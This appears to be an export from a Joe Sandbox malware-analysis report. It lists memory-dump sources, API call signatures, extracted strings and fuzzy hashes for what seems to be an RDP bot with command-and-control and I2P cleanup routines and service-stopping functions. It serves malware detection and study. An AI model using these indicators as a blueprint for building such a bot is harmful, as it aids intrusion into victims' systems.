                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$ErrorLastProtectQuery
                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                    • API String ID: 637304234-2123141913
                                                                    • Opcode ID: eeb0f8908b565efe05f1034d9ca574a31fc389ee18094d8b7d6ed2ddd800573e
                                                                    • Instruction ID: a171d5b9c5cd52b808e1e85158dcb3d425c17dfe41316bb7c734173eb9b40b55
                                                                    • Opcode Fuzzy Hash: eeb0f8908b565efe05f1034d9ca574a31fc389ee18094d8b7d6ed2ddd800573e
                                                                    • Instruction Fuzzy Hash: 0531BF32B0AE1285EB109F53E84416C27AAEF85BA4F5885B9DD0D473B4EE3CE441C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$ErrorLastProtectQuery
                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                    • API String ID: 637304234-2123141913
                                                                    • Opcode ID: ea9c6495ba8c563decb4ca833a9109ca8136e51b28a442f802252e464f489548
                                                                    • Instruction ID: 3479f7c207f019457ff450507b48390c1860d7fef55bca0879293208951140e9
                                                                    • Opcode Fuzzy Hash: ea9c6495ba8c563decb4ca833a9109ca8136e51b28a442f802252e464f489548
                                                                    • Instruction Fuzzy Hash: 7431A271B09E428DEA008F17E8416AD2761EF69BA4F448275DE6D2B7B5DE3CE446C308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp$Heap$FreeProcessstrcpystrlen
                                                                    • String ID: NAMING$NAMING LOOKUP NAME=%s$REPLY$RESULT$VALUE
                                                                    • API String ID: 4033962467-581645075
                                                                    • Opcode ID: d82c7a298056fb6de1b2f0056544940b41cea02410fd72c23628b14edce4f0b3
                                                                    • Instruction ID: 45ed08559c54dea620bc2f242c7f9e30e15e8fb91f57d95dd52b2705af4a98ef
                                                                    • Opcode Fuzzy Hash: d82c7a298056fb6de1b2f0056544940b41cea02410fd72c23628b14edce4f0b3
                                                                    • Instruction Fuzzy Hash: 83316652A0DE4345FB2596AB98102BD126E6F413B4F6903B5DD3D0B3F9FE2DE5028340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLast
                                                                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                    • API String ID: 1799206407-1112464793
                                                                    • Opcode ID: b250dac3c5079807c9d67ca754ccbdb42e9ed6e9e2d20b42dc24d35b26cf52f9
                                                                    • Instruction ID: 45a6da15fce51882198cf6b5a054061e7e0c502d83324e6a2291a4c444a289d9
                                                                    • Opcode Fuzzy Hash: b250dac3c5079807c9d67ca754ccbdb42e9ed6e9e2d20b42dc24d35b26cf52f9
                                                                    • Instruction Fuzzy Hash: 8521BA54F0CE8BCAFB60565A948437C56809F20336F2449B2D5BFE91F5CE2CEC85560A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: inet_addr
                                                                    • String ID: (s != NULL)$(v != NULL)$H:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
                                                                    • API String ID: 1393076350-2916536452
                                                                    • Opcode ID: 74e4e199fd59fe66a48ec781d56a45989c4e58514d9d210b782fc1033c8132ae
                                                                    • Instruction ID: bd9be68cba4fcc3b2b77c9326b258dfca131a82c6f86cde6073709b5648badf3
                                                                    • Opcode Fuzzy Hash: 74e4e199fd59fe66a48ec781d56a45989c4e58514d9d210b782fc1033c8132ae
                                                                    • Instruction Fuzzy Hash: 521182E4A08D0792FB119BA6E4803BC3BAABF50328F4455B5D91E8B1F4DF3DE9458301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: inet_addr
                                                                    • String ID: (s != NULL)$(v != NULL)$H:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
                                                                    • API String ID: 1393076350-2916536452
                                                                    • Opcode ID: 3eb9f545268111e300f5b7aa64c495c7c6dbc01067e67b233289fcffbe879363
                                                                    • Instruction ID: 6300ca95b963178236c7dbab3901b7b63a082a8d5c4060372b6f0b74b922afd2
                                                                    • Opcode Fuzzy Hash: 3eb9f545268111e300f5b7aa64c495c7c6dbc01067e67b233289fcffbe879363
                                                                    • Instruction Fuzzy Hash: 511170A4E08D0BCAFB019B62E8003F86255AF34328F4441B2D57DAA1B2DF3DA8459308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastLibraryLoadProc
                                                                    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                                                    • API String ID: 3511525774-1584720945
                                                                    • Opcode ID: 4f2ecd864c71f42e00856e3e521dde8d760e99c0cb8ee026b08ac7068f9b0c9b
                                                                    • Instruction ID: a3c8bc6f0810b96f552f189a0ab0e60534b89b0e2a3752c20fa2a9ec42b0d681
                                                                    • Opcode Fuzzy Hash: 4f2ecd864c71f42e00856e3e521dde8d760e99c0cb8ee026b08ac7068f9b0c9b
                                                                    • Instruction Fuzzy Hash: A611C960E2DE4391FB12AB97E8543B8225A6F51328F9800FAE40D862B1FF6CE944C341
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastLibraryLoadProc
                                                                    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                                                    • API String ID: 3511525774-1584720945
                                                                    • Opcode ID: dd2d016bc414a8fbd275c16850b5fd45635f63f7c4028b960cc0e3c20d977c37
                                                                    • Instruction ID: 9ba339b6e8bc952cf6b9cae47b4541bde2a813b4eae4a8deef18cf1965e9127b
                                                                    • Opcode Fuzzy Hash: dd2d016bc414a8fbd275c16850b5fd45635f63f7c4028b960cc0e3c20d977c37
                                                                    • Instruction Fuzzy Hash: EB11F760F1DE43DCFA14971BA8513B862516F34364F9401F2E43DAA2B2EE6CE945C30C
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Service$CloseControlErrorHandleLastOpen
                                                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                                                    • API String ID: 3311966420-638458398
                                                                    • Opcode ID: e8deac39b554ca3a5095b21f90a19be0419249a2b92e6be53a90add666cfc3cc
                                                                    • Instruction ID: b899158e24d9f10d5ea9500cd9b2daa364a0fefe6eefa4c43b8b69d14281b1e7
                                                                    • Opcode Fuzzy Hash: e8deac39b554ca3a5095b21f90a19be0419249a2b92e6be53a90add666cfc3cc
                                                                    • Instruction Fuzzy Hash: E40148A1B09B5391FA319F55E84437927A0FF55B88F445036DA9E473B0EE2CE454CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Service$CloseControlErrorHandleLastOpen
                                                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                                                    • API String ID: 3311966420-638458398
                                                                    • Opcode ID: 11842d34c38b544ad540f12ef98594c8cd76dd3e3870d5edc4c0624947a150da
                                                                    • Instruction ID: 5eece2d407fe10edae7eb548018431f4bd4dcb164ff59237ed0a55693f800a11
                                                                    • Opcode Fuzzy Hash: 11842d34c38b544ad540f12ef98594c8cd76dd3e3870d5edc4c0624947a150da
                                                                    • Instruction Fuzzy Hash: 460148A1B09B5391FA319F55E84437927A0FF55B89F445036DA9E473B0EE2CE454CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                                                    • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                                                    • API String ID: 1533789296-1853374401
                                                                    • Opcode ID: c0369e687f8a829efbc8b28538350eeb01608e2c039c8ba3332f0e6600f61d84
                                                                    • Instruction ID: a8d6bc885010f173095d7926e6984aa11e8c95df7d1f0bfa8d69b9bb6b50a441
                                                                    • Opcode Fuzzy Hash: c0369e687f8a829efbc8b28538350eeb01608e2c039c8ba3332f0e6600f61d84
                                                                    • Instruction Fuzzy Hash: 8C01D260E2DD4395FB129797E8543BC235E6F51328F9841F6D40E862B1EF7CE9458301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                                                    • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                                                    • API String ID: 1533789296-1853374401
                                                                    • Opcode ID: 199b7c4e193ab412065d3af7039d3c2ec05d4ab750b84b281bb691d22d678d33
                                                                    • Instruction ID: f535040f58045a09f0e0152d4beade37af07c1f08538d9bfa213254de62638d5
                                                                    • Opcode Fuzzy Hash: 199b7c4e193ab412065d3af7039d3c2ec05d4ab750b84b281bb691d22d678d33
                                                                    • Instruction Fuzzy Hash: 4101ED60B0CE47DCFA10D717E8513B866516F34364F8400F2D43EA52B6DE6DE946831C
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: C_StopI2P$C_TerminateI2P$Done$[I] (%s) -> %s$i2p_cleanup
                                                                    • API String ID: 3013587201-3114442857
                                                                    • Opcode ID: 3fcda33e0bcb24fe2b0e0be5400163abc4aa4804fdeba9f388e3eac77f141408
                                                                    • Instruction ID: ce60b112a2f03631fcc62f4c659b4be6e0b954eeb517719142c53b2ba2082537
                                                                    • Opcode Fuzzy Hash: 3fcda33e0bcb24fe2b0e0be5400163abc4aa4804fdeba9f388e3eac77f141408
                                                                    • Instruction Fuzzy Hash: 11F0FF50E1AE0391FF46ABABE8447BC236AAF443B4F4950B5C80D86271AF6CE549C310
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Heap$CloseDeleteEnterFreeHandleLeaveObjectProcessSingleWait
                                                                    • String ID: Done$[I] (%s) -> %s$ebus_cleanup
                                                                    • API String ID: 3198640931-3713968270
                                                                    • Opcode ID: f93e207e0bbcc97885a442e08f10a3ec1dec0c0acac52272c6c7fbf95795af8d
                                                                    • Instruction ID: 62783b48a63b349fdcb0a18e27aff3212e2072acfff611d673f59611dd5e9977
                                                                    • Opcode Fuzzy Hash: f93e207e0bbcc97885a442e08f10a3ec1dec0c0acac52272c6c7fbf95795af8d
                                                                    • Instruction Fuzzy Hash: 2E01A220A09E4385FB51AB57E898378236AAF40B38F5053B9C43E462F1DF6DA846C301
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep_amsg_exit$_initterm
                                                                    • String ID:
                                                                    • API String ID: 2193611136-0
                                                                    • Opcode ID: ff15f92263da72b6589bcb57768b1c9c5409c3588207ae47f6362082b155a3ca
                                                                    • Instruction ID: f34457f9bd75a506dee2f4c7a1a3430d0ade24ef32a4bfaa87ae819c9de98d2f
                                                                    • Opcode Fuzzy Hash: ff15f92263da72b6589bcb57768b1c9c5409c3588207ae47f6362082b155a3ca
                                                                    • Instruction Fuzzy Hash: F1414F25B0DE4286F7669B97D89027D32AEAF487E4F5840B9DD4D873B1EE2CE540C342
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep_amsg_exit$_initterm
                                                                    • String ID:
                                                                    • API String ID: 2193611136-0
                                                                    • Opcode ID: 0cecec70258728eb6715608d41813f9c103590fdecf603ec3132883e55843f2c
                                                                    • Instruction ID: 52e27b6f7e2f30713582dc6a79cd1bf3bc124d542c3b1bddc5a567d77d10fbb0
                                                                    • Opcode Fuzzy Hash: 0cecec70258728eb6715608d41813f9c103590fdecf603ec3132883e55843f2c
                                                                    • Instruction Fuzzy Hash: 29418D25E0DE46CDFB598B57D95033D2391AF68BA4F5840B1CD6DA73B2DE2CE4408348
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$CloseEnterFreeHandleLeaveObjectProcessSingleWait
                                                                    • String ID: Done$[I] (%s) -> %s$cnc_cleanup
                                                                    • API String ID: 2328319284-299082219
                                                                    • Opcode ID: 3cfcfb82a74db4adafacd3c664063167480534ea8effa3f1f5740a816187b25e
                                                                    • Instruction ID: d1189c635d3bbef099492b6c22871bc1c7c28a8822f052a509b623043feeda67
                                                                    • Opcode Fuzzy Hash: 3cfcfb82a74db4adafacd3c664063167480534ea8effa3f1f5740a816187b25e
                                                                    • Instruction Fuzzy Hash: EC119E60A49E4385F742AF63E868369366AAF41378F5003B9D03D0A2F1CFBDA5898740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
